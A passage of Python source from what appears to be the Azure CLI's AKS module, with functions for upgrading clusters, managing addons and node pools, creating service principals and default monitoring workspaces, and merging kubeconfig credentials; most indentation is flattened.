msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
    :param endpoint_type: The endpoint type to be used for an Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
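# Shared helper for enable-addons / disable-addons: toggles the requested addon profiles on
# the ManagedCluster object and returns it for the caller to send back to the resource provider.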
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
    # for each addon argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {}" '
                                   'before enabling it again.'.format(resource_group_name))
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
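# Build the initial addon profile map for "az aks create --enable-addons ...". Unknown addon
# names are rejected, and the monitoring addon falls back to a default Log Analytics
# workspace when none is supplied.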
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
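# Resolve (or create) the default Log Analytics workspace used by the monitoring addon.
# The workspace is placed in a region-mapped resource group; the resulting resource ID has
# the form (illustrative values):
#   /subscriptions/<sub>/resourceGroups/DefaultResourceGroup-EUS/providers/
#       Microsoft.OperationalInsights/workspaces/DefaultWorkspace-<sub>-EUS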
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
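# Deploy the ContainerInsights solution into the Log Analytics workspace referenced by the
# omsagent addon config, using an inline ARM deployment in the workspace's resource group.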
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
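# Resolve an ACR either by full resource ID or by name across the subscription, then add
# (or remove, when detach=True) the AcrPull role assignment for the given client ID.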
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
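# Illustrative invocation of the command backed by aks_agentpool_add (flags assumed from the
# parameters below):
#   az aks nodepool add -g MyResourceGroup --cluster-name MyManagedCluster \
#       -n nodepool2 --node-count 3 --mode User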
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
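# Add or delete the AcrPull role assignment on the registry scope; failures are surfaced as
# CLIError since they usually indicate missing Owner permissions on the subscription.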
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
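# Create (or validate) the service principal used by a non-MSI cluster. When none is supplied,
# a new AAD application is registered with a generated secret and a placeholder URL, and the
# AAD session key is returned for use as a request header during cluster creation.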
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
        # This reply_url is temporarily set since Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
        # add the role assignment before saving it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count are only valid when --enable-cluster-autoscaler is specified')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
